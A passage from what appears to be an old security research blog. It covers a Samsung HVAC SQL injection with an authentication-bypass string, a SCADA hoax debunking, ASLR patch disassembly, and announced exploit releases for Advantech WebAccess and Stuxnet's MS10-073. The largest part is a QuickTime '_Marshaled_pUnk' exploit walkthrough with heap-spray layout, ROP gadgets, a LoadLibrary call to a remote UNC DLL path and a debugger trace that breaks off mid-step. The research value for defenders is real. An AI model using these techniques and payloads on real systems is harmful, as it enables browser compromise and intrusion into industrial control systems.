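PresentationHost.exe belonged to. Sample GUIDs and paths are constructed.
"""
import re
from typing import Dict, List, Tuple

ELEVATION_KEY = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer"
                 r"\Low Rights\ElevationPolicy")

# Meaning of the Policy DWORD, from the Protected Mode reference linked above.
POLICY_NAMES = {
    0: "blocked by Protected Mode",
    1: "launched silently at low integrity",
    2: "user prompted before medium-integrity launch",
    3: "launched silently at medium integrity",
}

# Constructed sample export ("regedit /e" output, already decoded to str).
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{00000000-0000-0000-0000-000000000001}]
"AppName"="PresentationHost.exe"
"AppPath"="C:\\Windows\\System32"
"Policy"=dword:00000003

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{00000000-0000-0000-0000-000000000002}]
"AppName"="vendorhelper.exe"
"AppPath"="C:\\Program Files\\Vendor"
"Policy"=dword:00000002

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{00000000-0000-0000-0000-000000000003}]
"AppName"="updater.exe"
"AppPath"="C:\\Program Files\\Other"
"Policy"=dword:00000003
"""

KEY_RE = re.compile(r"^\[(?P<key>[^\]]+)\]$")
VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"=(?P<val>.*)$')


def parse_reg(text: str) -> Dict[str, Dict[str, object]]:
    """Minimal .reg reader: {key_path: {value_name: value}}.

    Decodes quoted strings (with \\ and \" escapes) and dword: values, which
    is all an ElevationPolicy entry uses; other value types are kept raw.
    """
    keys: Dict[str, Dict[str, object]] = {}
    current = None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        km = KEY_RE.match(line)
        if km:
            current = keys.setdefault(km["key"], {})
            continue
        vm = VALUE_RE.match(line)
        if vm is None or current is None:
            continue
        raw = vm["val"]
        if raw.startswith("dword:"):
            current[vm["name"]] = int(raw[6:], 16)
        elif raw.startswith('"') and raw.endswith('"'):
            current[vm["name"]] = raw[1:-1].replace('\\"', '"').replace("\\\\", "\\")
        else:
            current[vm["name"]] = raw
    return keys


def silent_brokers(reg_text: str) -> List[Tuple[str, str, str]]:
    """(GUID, AppName, AppPath) for every ElevationPolicy entry with Policy == 3."""
    found: List[Tuple[str, str, str]] = []
    prefix = ELEVATION_KEY.lower() + "\\"
    for key, values in parse_reg(reg_text).items():
        if not key.lower().startswith(prefix):
            continue                      # some other key in the export
        if values.get("Policy") == 3:
            guid = key[len(prefix):]
            found.append((guid, str(values.get("AppName", "")),
                          str(values.get("AppPath", ""))))
    return found


if __name__ == "__main__":
    for guid, app, path in silent_brokers(SAMPLE_REG):
        print(f"{guid}  {path}\\{app}  ({POLICY_NAMES[3]})")
```

A real export comes from `regedit /e out.reg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy"`, which writes UTF-16LE with a BOM, so read it with `encoding="utf-16"` before passing it in.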
Analyzing CVE-2010-4284 - Samsung Data Management Server SQLi
(Monday, 09 May 2011) Written by Rubén
Hi
Several months ago the Spanish security researcher (ese wachi!! ;) ) José Antonio Guasch discovered a SQLi in the login panel of a Samsung HVAC device. Thus, an attacker successfully exploiting this flaw can bypass authentication and access the web server as an administrative user. Samsung, ICS-CERT and José Antonio coordinated this issue and finally the advisory and the patch have been released. The first curious thing I came across while reading http://www.dvmcare.com/SRM/dms/HowToUpgradeDMSSW.pdf was that in the whole document there was not a single line or picture explaining how to authenticate before updating the firmware. The reason is simple: you don't need to be authenticated at all. Let's analyze the updater http://www.dvmcare.com/SRM/dms/DMSUpdaterPlus.zip using ILSpy. It's pretty clear, isn't it? Root access for everybody through telnet and ftp:

BusyBox v1.00 (2005.03.22-03:58+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.

~ # help
Built-in commands:
-------------------
. : alias bg break cd chdir continue eval exec exit export false fg getopts hash help jobs kill let local pwd read readonly return set shift times trap true type ulimit umask unalias unset wait

The patch that fixes the SQLi is the following piece of code, which you can find by decompressing the firmware and then taking a look at '\chiweb\LoginManager.class':

public static boolean verifyUser(String id, String password) {
    CDBManager dbManager = null;
    ResultSet rs = null;
    boolean isValid = false;
    if ((id == null) || (password == null))
        return false;
    // Blacklist: reject ' (39), = (61), "--", ; (59) and % (37) in both fields
    int index1 = id.indexOf(39);
    int index2 = id.indexOf(61);
    int index3 = id.indexOf("--");
    int index4 = id.indexOf(59);
    int index5 = id.indexOf(37);
    if ((index1 >= 0) || (index2 >= 0) || (index3 >= 0) || (index4 >= 0) || (index5 >= 0))
        return false;
    index1 = password.indexOf(39);
    index2 = password.indexOf(61);
    index3 = password.indexOf("--");
    index4 = password.indexOf(59);
    index5 = password.indexOf(37);
    if ((index1 >= 0) || (index2 >= 0) || (index3 >= 0) || (index4 >= 0) || (index5 >= 0))
        return false;
    try {
        dbManager = new CDBManager();
        // The query is still assembled by string concatenation
        String strQuery = "select id, description from UserList where id = '" + id + "' and pwd = '" + password + "'";
        // ... (rest of the decompiled method not shown)

Game over. You should be disabling any external access to these devices right now http://eripp.com/?ipdb=1&search=samsung+data+management&sort=time&order=DESC&limit=200
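The decompiled method above still builds its SQL by concatenation and relies on a character blacklist in front of it. As an added example (not code from the post or from Samsung), the same login query is rebuilt two ways against an in-memory SQLite table: the concatenating form that corresponds to the original bug, and a parameterised form in which the input can only ever be compared as data. The UserList columns (id, pwd, description) are taken from the query string in the decompiled class; the sample user row is constructed.

```python
"""The verifyUser login query rebuilt two ways: concatenated vs parameterised.

Added example, not from the original post or from Samsung's code. An
in-memory SQLite table stands in for the device database; the columns come
from the query in the decompiled class, the sample row is constructed.
"""
import sqlite3
from typing import Dict, Optional, Tuple

Row = Optional[Tuple[str, str]]


def make_db() -> sqlite3.Connection:
    """Constructed sample database with one administrative user."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE UserList (id TEXT PRIMARY KEY, pwd TEXT, description TEXT)")
    conn.execute("INSERT INTO UserList VALUES ('admin', 'S3cret!', 'administrator')")
    conn.commit()
    return conn


def verify_user_concat(conn: sqlite3.Connection, user_id: str, password: str) -> Row:
    """Vulnerable: input is spliced into the SQL text, so a quote in the input
    ends the literal and the rest is parsed as SQL (the pre-patch behaviour)."""
    query = ("select id, description from UserList where id = '" + user_id
             + "' and pwd = '" + password + "'")
    return conn.execute(query).fetchone()


def verify_user_param(conn: sqlite3.Connection, user_id: str, password: str) -> Row:
    """Fixed: the statement text is constant; the driver binds both values,
    so no character blacklist is needed for the query to stay intact."""
    query = "select id, description from UserList where id = ? and pwd = ?"
    return conn.execute(query, (user_id, password)).fetchone()


# The textbook authentication-bypass input: it closes the pwd literal and
# appends a condition that is always true.
BYPASS_PASSWORD = "' OR '1'='1"


def demo() -> Dict[str, Row]:
    conn = make_db()
    return {
        "valid_concat": verify_user_concat(conn, "admin", "S3cret!"),
        "valid_param": verify_user_param(conn, "admin", "S3cret!"),
        "bypass_concat": verify_user_concat(conn, "admin", BYPASS_PASSWORD),
        "bypass_param": verify_user_param(conn, "admin", BYPASS_PASSWORD),
    }


if __name__ == "__main__":
    for case, row in demo().items():
        print(f"{case:14s} -> {row}")
```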
Reverse engineering a SCADA hoax
(Monday, 18 April 2011) Written by Rubén
Well, before the snowball gets bigger (too late, I guess) I'll try to explain why I think the FPL hack is a hoax.
Context: FD ...
Let's analyze the email:
Here comes my revenge for illegitimate firing from Florida Power & Light Company (FPL) ... ain't nothing you can do with it, since your electricity is turned off !!!
D'oh, not very original: disgruntled former engineer... if real, too many clues...
Secure you SCADA better! Leaked files are attached ...
1) http://img838.imageshack.us/i/49986845.png/
Taking into account that it claims he hacked a 200 MW / 136-turbine wind farm, those 3945 kW / 135 kWh make no sense for a large wind energy facility. Another weird thing is the "energie" button (energy in German). Wind speed metered in m/s without mentioning mph is still possible, so that's ok for me.
2) http://img838.imageshack.us/i/24380855.png/
3) http://img24.imageshack.us/i/58868342.png/
Whether you have WinCC or GIMP/Paint/Photoshop, you'll be able to create this creepy synoptic. If you manage to convince me that a 200 MW facility is controlled by this synoptic, I'll kiss your shiny metal ass. Even the lines are malformed. The input voltage line for the Sinamics S120 is used as feeder for 'whatever' those fans are representing. Absurd. Also note the custom messages in German... Everybody knows that at FPL German is the corporate language ¬¬
4) http://img228.imageshack.us/i/85258364.png/
ftp://goxftp01.fpl.com/pub/oasis/ ... no comment
5) http://img163.imageshack.us/i/90736853.png/
6) http://img217.imageshack.us/i/55439027.png/
7) http://img40.imageshack.us/i/87526089.png/
8) http://img864.imageshack.us/i/94061747.png/
Lifted from the following public document ftp://goxftp01.fpl.com/pub/oasis/switchyardreliability/switchyardreliability.pdf ... no comment

161.154.232.65
HTTP/1.0 401 Unauthorized
Date: Sat, 05 Feb 2011 23:43:13 GMT
Server: VTS 9.0.05
Content-Type: text/html
Content-Length: 622
Cache-Control: no-cache
WWW-Authenticate: Basic realm="Ft. Sumner SCADA"
Cache-control: no-cache="set-cookie"
Cache-control: private
Set-Cookie: VTS=9.0005;Version=1;Path=/
Set-Cookie: SessionID=0;Version=1;Path=/Ft. Sumner SCADA/cc8620ba-ad1a-4ae9-96ed-036c22c3576a
Set-Cookie: SessionID=0;Version=1;Path=/Ft%2e%20Sumner%20SCADA/cc8620ba-ad1a-4ae9-96ed-036c22c..

The IP does not match the headers. The headers correspond to a computer running water-treatment HMI software developed by Trihedral; "Server: VTS" is the key. Some time ago I reported to ICS-CERT that dozens of facilities running this software could be accessed by using the default password. The people behind this hoax probably used this info to reinforce it, since 'WWW-Authenticate: Basic realm="Ft. Sumner SCADA"' links it to Fort Sumner, where this wind farm is located. Moreover, according to public docs the wind farm operates 136 1.5 MW GE turbines, likely controlled by GE's hardware/software... WindControl, WindSCADA... The Cisco IOS config is nothing special...
Conclusion: FAKE.
ASLR_Tricks--
(Saturday, 16 April 2011) Written by Rubén
Hi
The latest patches killed one reliable and publicly known trick to bypass ASLR. Let's see how Microsoft implemented this patch. First off we have to recall how the trick worked. DotNet user controls could be hosted, although sandboxed, in IE. Later on, after Dowd and Sotirov presented their talk at BlackHat, the trick was restricted to higher security zones. However, IE was still loading MIME handlers when detecting DotNet user controls, which involved loading the famous non-ASLR mscorie.dll. Thus this single line would do the work. This mechanism is handled by urlmon. Before patching, the flow was basically urlmon!CProtMgr::FindFirstCF -> CProtMgrMimeHandler::LookupClsIDFromReg -> CoGetClassObject -> LoadLibraryEx. Now it's a little bit different.

.text:711E79E0 call dword ptr [eax+8] ; CProtMgrMimeHandler::LookupClsIDFromReg
.text:711E79E3 mov [ebp+ppv], eax
.text:711E79E6 mov eax, 800C000Eh
.text:711E79EB cmp [ebp+ppv], eax
.text:711E79EE jnz short loc_711E7A02
.text:711E79F0 mov esi, offset _GUID_NULL
.text:711E79F5 mov [ebp+var_2C], eax
.text:711E79F8
.text:711E79F8 loc_711E79F8: ; CODE XREF: CProtMgr::FindFirstCFWithValidation(ushort const *,IClassFactory * *,_GUID *,IProtocolHandlerValidator *)+BBj
.text:711E79F8 movsd
.text:711E79F9 movsd
.text:711E79FA movsd
.text:711E79FB movsd
.text:711E79FC mov edi, [ebp+var_40]
.text:711E79FF mov esi, [ebp+var_48]
.text:711E7A02
.text:711E7A02 loc_711E7A02: ; CODE XREF: CProtMgr::FindFirstCFWithValidation(ushort const *,IClassFactory * *,_GUID *,IProtocolHandlerValidator *)+9Ej
.text:711E7A02 ; CProtMgr::FindFirstCFWithValidation(ushort const *,IClassFactory * *,_GUID *,IProtocolHandlerValidator *)+DAj
.text:711E7A02 mov eax, [ebp+var_30]
.text:711E7A05 test eax, eax
.text:711E7A07 jz short loc_711E7A3E
.text:711E7A09 cmp [ebp+var_2C], 0
.text:711E7A0D jz short loc_711E7A15
.text:711E7A0F cmp [ebp+ppv], 0
.text:711E7A13 jnz short loc_711E7A3E
.text:711E7A15
.text:711E7A15 loc_711E7A15: ; CODE XREF: CProtMgr::FindFirstCFWithValidation(ushort const *,IClassFactory * *,_GUID *,IProtocolHandlerValidator *)+F9j
.text:711E7A15 mov ecx, [eax]
.text:711E7A17 push edi
.text:711E7A18 push eax
.text:711E7A19 call dword ptr [ecx+0Ch] ; urlmon!CTransaction::ValidateClsId

ValidateClsId is explicitly added to check for DotNet User Controls:

.text:711E5150
.text:711E5150 ; =============== S U B R O U T I N E =======================================
.text:711E5150
.text:711E5150 ; Attributes: bp-based frame
.text:711E5150
.text:711E5150 ; public: virtual long __stdcall CTransaction::ValidateClsId(struct _GUID *)
.text:711E5150 ?ValidateClsId@CTransaction@@UAGJPAU_GUID@@@Z proc near
.text:711E5150 ; DATA XREF: .text:71185B90o
.text:711E5150
.text:711E5150 arg_0 = dword ptr 8
.text:711E5150 arg_4 = dword ptr 0Ch
.text:711E5150
.text:711E5150 mov edi, edi
.text:711E5152 push ebp
.text:711E5153 mov ebp, esp
.text:711E5155 push esi
.text:711E5156 mov esi, [ebp+arg_4]
.text:711E5159 push edi
.text:711E515A xor eax, eax
.text:711E515C push 4
.text:711E515E pop ecx
.text:711E515F mov edi, offset _CLSID_DotNetUserControl
.text:711E5164 xor edx, edx
.text:711E5166 repe cmpsd
.text:711E5168 jnz short loc_711E51C9
.text:711E516A mov eax, [ebp+arg_0]
.text:711E516D mov esi, [eax+14h]
.text:711E5170 test esi, esi
.text:711E5172 jnz short loc_711E5177
.text:711E5174 mov esi, [eax+30h]
.text:711E5177
.text:711E5177 loc_711E5177: ; CODE XREF: CTransaction::ValidateClsId(_GUID *)+22j
.text:711E5177 test esi, esi
.text:711E5179 mov edi, 80070057h
.text:711E517E jz short loc_711E51C7
.text:711E5180 call ?EnsureSecurityManager@@YGJXZ ; EnsureSecurityManager(void)
.text:711E5185 test eax, eax
.text:711E5187 jl short loc_711E51C7
.text:711E5189 mov eax, ?g_pInternetSecurityManagerEx2@@3PAUIInternetSecurityManagerEx2@@A ; IInternetSecurityManagerEx2 * g_pInternetSecurityManagerEx2
.text:711E518E and [ebp+arg_0], 0
.text:711E5192 lea edx, [ebp+arg_0]
.text:711E5195 push edx
.text:711E5196 push 0
.text:711E5198 push 1
.text:711E519A push 0
.text:711E519C push 0
.text:711E519E push 4
.text:711E51A0 lea edx, [ebp+arg_4]
.text:711E51A3 push edx
.text:711E51A4 push 2005h
.text:711E51A9 push esi
.text:711E51AA mov [ebp+arg_4], 3
.text:711E51B1 mov ecx, [eax]
.text:711E51B3 push eax
.text:711E51B4 call dword ptr [ecx+34h] ; CSecurityManager::ProcessUrlActionEx2

So now, even before loading DotNet MIME handlers, the zone and policies mapped to the URL are processed, thus preventing the trick :(
SCADA Trojans: Attacking the Grid + 0dayZ!
(Tuesday, 22 March 2011) Written by Rubén
Hi! You can download the slides of the research I presented at RootedCon'11 in Madrid, "SCADA Trojans: Attacking the grid", a journey into attacking the power grid. I presented:
- 0days in the Advantech/BroadWin WebAccess SCADA product
- Weak design/vulnerabilities in CSE-Semaphore TBOX RTUs
- A general attack against EMS software via state estimators
I contacted ICS-CERT to coordinate with Advantech, but the vendor denied having a security flaw. So guys, the exploit I'm releasing does not exist. It is all a product of your mind. Well, indeed WebAccess is full of bugs. It is an RPC exploit against the WebAccess Network Service, port 4592. It leaks the security code that protects the SCADA node, in addition to demonstrating RCE on XP. Slight modifications can be made to support other systems. I use an "RPC heap spray"; I mean that any opcode with the following params, "[in] long arg_x, [in][ref][size_is(arg_x)] char * arg_x", can be used to create a fake object to control execution. It could be done in other ways, but this one is fun. Check the slides; there is more info about the vulns there.
Download Exploit source code
Download Slides [PDF] "SCADA Trojans: Attacking the Grid"
Bye!
Stuxnet MS10-073/CVE-2010-2743 Exploit
(Thursday, 13 January 2011) Written by Rubén
Hi everyone,
To inaugurate 2011 I decided to release the exploit code for one of the EoP vulnerabilities exploited by Stuxnet. Stuxnet. What else could we say? It was the best gift of 2010. Stuxnet used this flaw to escalate privileges on XP/2K boxes. It's stored in resource 250, XORed; can you guess the key? ;) After performing several paranoid checks to avoid unsuccessful exploitation (elaborated by VUPEN), the party starts... The vulnerability has already been explained, so just a couple of notes.

Resource250.dll
.text:10001082 test si, si
.text:10001085 jnz short loc_100010A9
.text:10001087 push [ebp+var_4]
.text:1000108A lea eax, [ebp+var_44]
.text:1000108D push eax
.text:1000108E call GoGoGo
...
.text:10002A48 lea eax, [ebp+var_218]
.text:10002A4E push eax
.text:10002A4F lea eax, [ebp+var_8]
.text:10002A52 push eax
.text:10002A53 push edi
.text:10002A54 call CreateFakeKbdLayoutFile

Stuxnet creates a temporary file and writes into it a minimalistic fake keyboard layout DLL, built to be swallowed by win32k!ReadLayoutFile without problems.

.text:10001FC6 loc_10001FC6: ; CODE XREF: CreateFakeKbdLayoutFile+CFj
.text:10001FC6 push ebx
.text:10001FC7 lea eax, [ebp+var_4]
.text:10001FCA push eax
.text:10001FCB push 246h
.text:10001FD0 push offset unk_1000B058 ; fake Keyboard Layout Dll
.text:10001FD5 push esi
.text:10001FD6 call WriteFile

Then it is ready to trigger the vuln and execute the shellcode:

.text:10002A63 push [ebp+var_8]
.text:10002A66 push edi
.text:10002A67 push esi
.text:10002A68 push [ebp+arg_0]
.text:10002A6B push [ebp+var_4]
.text:10002A6E call TriggerVuln
...
.text:100027F3 push 101h
.text:100027F8 push [ebp+var_8]
.text:100027FB push eax
.text:100027FC push [ebp+var_4]
.text:100027FF push 1AE0160h
.text:10002804 push [ebp+arg_10]
.text:10002807 call LoadFakeKBDviaNtUserLoadKeyboardLayoutEx

Finally

.text:10002839 push 1Ch
.text:1000283B lea eax, [ebp+var_50]
.text:1000283E push eax
.text:1000283F push ebx
.text:10002840 mov [edi+38h], esi
.text:10002843 call SendInput

At this point the shellcode is being executed. Every time this code is executed God breaks something in Natanz.
[+] Download ms10-073-stuxnet.zip
[0day] Apple QuickTime "_Marshaled_pUnk" backdoor param client-side arbitrary code execution
(Monday, 30 August 2010) Written by Rubén
Hi there,
Today we're going to talk about an interesting "backdoor" I uncovered during a static reversing session against QTPlugin.ocx. WATCH OUT! Do not hype this issue beyond what it deserves. This time Backdoor != malicious code, but a horrible trick a developer implemented during the development cycle. These hacks can end up having a harmful impact. The scenario would be as follows:
Victim prerequisites:
* Internet Explorer.
* XP, Vista, W7.
* Apple QuickTime 7.x, 6.x (2004 versions are also vulnerable, older versions not checked)
1. Victim is enticed into visiting, by any means, a specially crafted webpage.
2. Attacker's payload is executed under the context of the browser.
3. Attacker calls his girlfriend to inform her about the successful exploitation, who indeed turns out to be very interested in the issue. She demands more technical details.
4. Attacker wakes up.
Technical details
QTPlugin.ocx implements IPersistPropertyBag2::Read (1000E330) to handle params received from wherever it is embedded, including HTML documents. Let's take a look:

.text:1000E330
.text:1000E330 ; =============== S U B R O U T I N E =======================================
.text:1000E330
.text:1000E330
.text:1000E330 sub_1000E330 proc near ; DATA XREF: .rdata:1002E0ECo
.text:1000E330 ; .rdata:1002E86Co
.text:1000E330
.text:1000E330 arg_0 = dword ptr 4
.text:1000E330 arg_4 = dword ptr 8
.text:1000E330 arg_8 = dword ptr 0Ch
.text:1000E330
.text:1000E330 push esi
.text:1000E331 mov esi, [esp+4+arg_0]
.text:1000E335 mov ecx, [esi+84h]
.text:1000E33B xor eax, eax
.text:1000E33D test ecx, ecx
.text:1000E33F jz short loc_1000E393
.text:1000E341 mov eax, [esp+4+arg_8]
.text:1000E345 mov edx, [esp+4+arg_4]
.text:1000E349 push eax
.text:1000E34A push edx
.text:1000E34B call sub_100031F0

Following the flow...
sub_10002980+27A
sub_10002980+27A loc_10002BFA: ; CODE XREF: sub_10002980+266j
sub_10002980+27A ; sub_10002980+272j
sub_10002980+27A push offset aType ; "type"
sub_10002980+27F push ebx ; lpString1
sub_10002980+280 call ebp ; lstrcmpiA
sub_10002980+282 test eax, eax
sub_10002980+284 jnz short loc_10002C22
sub_10002980+286 push edi ; lpString
sub_10002980+287 call ds:lstrlenA
sub_10002980+28D cmp eax, 104h
sub_10002980+292 jnb short loc_10002C22
sub_10002980+294 push edi ; lpString2
sub_10002980+295 lea edx, [esi+83Ch]
sub_10002980+29B push edx ; lpString1
sub_10002980+29C call ds:lstrcpyA
sub_10002980+2A2
sub_10002980+2A2 loc_10002C22: ; CODE XREF: sub_10002980+284j
sub_10002980+2A2 ; sub_10002980+292j
sub_10002980+2A2 push offset a_marshaled_pun ; "_Marshaled_pUnk"
sub_10002980+2A7 push ebx ; lpString1
sub_10002980+2A8 call ebp ; lstrcmpiA
sub_10002980+2AA test eax, eax
sub_10002980+2AC jnz short loc_10002C4A
sub_10002980+2AE push edi
sub_10002980+2AF call sub_10001310 ; SIMPLE ASCII NUMBERS TO LONG routine
sub_10002980+2B4 add esp, 4
sub_10002980+2B7 lea ecx, [esi+13B8h]
sub_10002980+2BD push ecx ; ppv
sub_10002980+2BE push offset iid ; iid
sub_10002980+2C3 push eax ; pStm
sub_10002980+2C4 call ds:CoGetInterfaceAndReleaseStream ; WE HAVE A WINNER!!
sub_10002980+2CA
sub_10002980+2CA loc_10002C4A: ; CODE XREF: sub_10002980+2ACj
sub_10002980+2CA push edi ; int

Oops! Programming rules state that hidden properties should be preceded by "_", so this property matches the requirement. It's time to google "_Marshaled_pUnk", which brings us 0 results. Apple's scripting guide for QuickTime does not even mention it. Weird. What is going on here? QTPlugin.ocx checks for the existence of "_Marshaled_pUnk" within the object's attributes; if present, it unmarshals it by converting the address from its ASCII representation into a numerical one (sub_10001310).
Then it uses the resulting pointer as pStm, "A pointer to the IStream interface on the stream to be unmarshaled", in CoGetInterfaceAndReleaseStream in order to obtain the IUnknown pointer (pUnk from now on) of the marshalled interface. This method is pretty common for sharing interface pointers between threads in COM-enabled scenarios (e.g. browsers + plugins). So we are controlling an IStream pointer, which is good :) However, at this point things didn't make sense to me. Despite the fact that a CPluginHost object's variable holds this pointer (pPlugin+0x13b8), pUnk is never used. According to the COM model, this pointer shouldn't be used by any other thread. Why in the hell did an Apple engineer implement this? A conspiracy between the NSA, the FSB and the bloody Andorran secret service may be possible, but I think there must be another explanation.
Back to the future
So I am downloading an older version of QTPlugin.ocx, which dates from 2004 (6.5.1.17), to try to explain an issue in 2010. Cool.
Module: QTPlugin.ocx
.text:6670BE86 mov eax, [ebp+1480h] ; pPlugin->pUnk
.text:6670BE8C cmp eax, edi
.text:6670BE8E jz short loc_6670BEF7
.text:6670BE90 lea edx, [esp+7Ch+pHandles]
.text:6670BE97 mov [esp+7Ch+pHandles], edi
.text:6670BE9E mov ecx, [eax]
.text:6670BEA0 push edx
.text:6670BEA1 push offset dword_667214C8 ; IID_IViewObject
.text:6670BEA6 push eax
.text:6670BEA7 call dword ptr [ecx] ; pUnk->QueryInterface(IID_IViewObject,pView)
.text:6670BEA9 test eax, eax
.text:6670BEAB jl short loc_6670BEF7
.text:6670BEAD mov edx, [esp+7Ch+arg_10]
.text:6670BEB4 push edi
.text:6670BEB5 push edi
.text:6670BEB6 mov eax, [esp+84h+pHandles]
.text:6670BEBD push edx
.text:6670BEBE mov edx, [esp+88h+arg_C]
.text:6670BEC5 mov ecx, [eax]
.text:6670BEC7 push edx
.text:6670BEC8 mov edx, [esp+8Ch+hdc]
.text:6670BECF push edx
.text:6670BED0 mov edx, [esp+90h+arg_4]
.text:6670BED7 push esi
.text:6670BED8 push edi
.text:6670BED9 push edi
.text:6670BEDA push 0FFFFFFFFh
.text:6670BEDC push edx
.text:6670BEDD push eax
.text:6670BEDE call dword ptr [ecx+0Ch] ; pView->Draw(...)

Reversing this function we can see that, in certain cases, QTPlugin.ocx could be instructed to draw content onto an existing window instead of creating a new one. Mystery solved. However, although this functionality was removed in newer versions, the param is still present. Why? I guess someone forgot to clean up the code.
Exploiting it
We control the IStream pointer passed to CoGetInterfaceAndReleaseStream; at a certain point during the execution flow of this function, an IStream method is going to be referenced:
ole32!wCoGetInterfaceAndReleaseStream -> ole32!CoUnmarshalInterface -> ole32!ReadObjRef -> ole32!StRead <= p0wn!!
So all we need to do is emulate a fake IStream interface in memory. How? Aligned heap spray FTW!
This is how our sprayed block would look in memory:

Heap      Value
15220c20  15220c18 // Fake VTable pointer
15220c24  29527ae7 // gadget1 WindowsLiveLogin
15220c28  27582d63 // gadget2 msidcrl40.dll
15220c2c  15220d08 // pParam for LoadLibrary (DLL UNC PATH)
15220c30  15220cbc // -add ecx, 0A0h, mov eax, [ecx]...- gadget2
15220c34  15220cbc
15220c38  15220cbc
15220c3c  15220cbc
15220c40  15220cbc
15220c44  15220cbc
15220c48  15220cbc
15220c4c  15220cbc
15220c50  15220cbc
15220c54  15220cbc
15220c58  15220cbc
15220c5c  15220cbc
15220c60  15220cbc
15220c64  15220cbc
15220c68  15220cbc
[...]
15220c98  15220cbc
15220c9c  15220cbc
15220ca0  15220cbc
15220ca4  15220cbc
15220ca8  15220cbc
15220cac  15220cbc
15220cb0  15220cbc
15220cb4  15220cbc
15220cb8  15220cbc
15220cbc  15220cbc
15220cc0  15220cbc
15220cc4  15220cbc
15220cc8  295481e8
15220ccc  295481e8 // LoadLibraryA
15220cd0  295481e8
15220cd4  295481e8
15220cd8  295481e8
15220cdc  295481e8
15220ce0  295481e8
15220ce4  295481e8
15220ce8  295481e8
15220cec  295481e8
15220cf0  295481e8
15220cf4  295481e8
15220cf8  295481e8
15220cfc  295481e8
15220d00  295481e8
15220d04  295481e8
15220d08  70785c5c // DLL UNC PATH "\\xpl8.nu\1"
15220d0c  6e2e386c
15220d10  00315c75

Data is sprayed in such a manner that we know that, despite ASLR, our block can be located at 0xXXXXX020, 0xXXXXX420, 0xXXXXX820 and 0xXXXXXc20. As you can see a couple of gadgets are used, since this is a ROP exploit; however esp is not controlled at all. I'm taking advantage of common code generated by C++ compilers to control parameters and execution. The gadgets come from Windows Live Messenger DLLs that are loaded by default in IE and have no ASLR flag.
0x29527AE7 WindowsLiveLogin.dll gadget1
mov edx, [esi+0Ch]
mov eax, [esi+8]
push edi
push offset dword_29501B68
push edx
call eax

0x27582D63 msidcrl40.dll gadget2
add ecx, 0A0h
mov eax, [ecx]
mov eax, [eax+10h]
pop ebp
jmp eax

Stepping into the payload:

ole32!StRead+0x15:
75c9af58 ff510c call dword ptr [ecx+0Ch] ds:0023:15220c24=29527ae7
0:004> t
eax=15220c20 ebx=05ca72a8 ecx=15220c18 edx=02c13968 esi=15220c20 edi=02c139d0
eip=29527ae7 esp=02c1394c ebp=02c13960 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
WindowsLiveLogin!DllCanUnloadNow+0x937:
29527ae7 8b560c mov edx,dword ptr [esi+0Ch] ds:0023:15220c2c=15220d08
0:004> t
eax=15220c20 ebx=05ca72a8 ecx=15220c18 edx=15220d08 esi=15220c20 edi=02c139d0
eip=29527aea esp=02c1394c ebp=02c13960 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
WindowsLiveLogin!DllCanUnloadNow+0x93a:
29527aea 8b4608 mov eax,dword ptr [esi+8] ds:0023:15220c28=27582d63
0:004> t
eax=27582d63 ebx=05ca72a8 ecx=15220c18 edx=15220d08 esi=15220c20 edi=02c139d0
eip=29527aed esp=02c1394c ebp=02c13960 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
WindowsLiveLogin!DllCanUnloadNow+0x93d:
29527aed 57 push edi
0:004> t
eax=27582d63 ebx=05ca72a8 ecx=15220c18 edx=15220d08 esi=15220c20 edi=02c139d0
eip=29527aee esp=02c13948 ebp=02c13960 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
WindowsLiveLogin!DllCanUnloadNow+0x93e:
29527aee 68681b5029 push offset WindowsLiveLogin+0x1b68 (29501b68)
0:004> t
eax=27582d63 ebx=05ca72a8 ecx=15220c18 edx=15220d08 esi=15220c20 edi=02c139d0
eip=29527af3 esp=02c13944 ebp=02c13960 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
WindowsLiveLogin!DllCanUnloadNow+0x943:
29527af3 52 push edx
0:004> t
eax=27582d63 ebx=05ca72a8 ecx=15220c18 edx=15220d08 esi=15220c20 edi=02c139d0
eip=29527af4 esp=02c13940 ebp=02c13960 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
WindowsLiveLogin!DllCanUnloadNow+0x944:
29527af4 ffd0 call eax {msidcrl40!EnumerateDeviceID+0xa113 (27582d63)}
0:004> t
eax=27582d63 ebx=05ca72a8 ecx=15220c18 edx=15220d08 esi=15220c20 edi=02c139d0
eip=27582d63 esp=02c1393c ebp=02c13960 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
msidcrl40!EnumerateDeviceID+0xa113:
27582d63 81c1a0000000 add ecx,0A0h
0:004> t
eax=27582d63 ebx=05ca72a8 ecx=15220cb8 edx=15220d08 esi=15220c20 edi=02c139d0
eip=27582d69 esp=02c1393c ebp=02c13960 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
msidcrl40!EnumerateDeviceID+0xa119:
27582d69 8b01 mov eax,dword ptr [ecx] ds:0023:15220cb8=15220cbc
0:004> t
eax=15220cbc ebx=05ca72a8 ecx=15220cb8 edx=15220d08 esi=15220c20 edi=02c139d0
